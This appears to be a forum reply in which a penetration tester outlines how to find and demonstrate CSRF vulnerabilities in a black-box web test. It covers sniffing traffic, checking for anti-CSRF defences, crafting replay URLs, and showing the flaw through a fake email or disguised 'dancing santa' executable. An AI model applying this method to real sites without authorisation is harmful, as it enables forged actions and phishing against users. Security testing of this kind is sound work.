Hi Hordakk, long time no see!
I did a similar test about 3 months ago. Sorry I am currently in a rush, I will try to add more details later. The way I approached it is in two parts:
A) Figuring out requests between the browser and the server
- Create an account on the tested web site;
- While trying all possible scenarios, sniff every single requests and responses between your browser and the server.
B) Figuring out how the session is managed
- Are they using "anti-CSRF" techniques?
- If not, try to craft a single URL (usually quite complex) that tries to reproduce each functionalities found in step A). Execute then on your logged in machine.
- If at least one crafted URL succeed, you have just found a CSRF vulnerability.
- Finally, just draft a fake email that demonstrate how a user could click on a link and trigger some activity on the web server. You can also add your URL in a fake Christmas executable (dancing santa, etc) or something like that.
CSRF examples almost always use money transfer or things like that. A CSRF vulnerability could ba as simple as login the user out or just change the way things are displayed. But everything found in a pentest is valuable for the client. They will be scared to "miss" something bigger next time...
And all this was achieve in a Black Box pentest, without really involving social engineering (because you can test it yourself).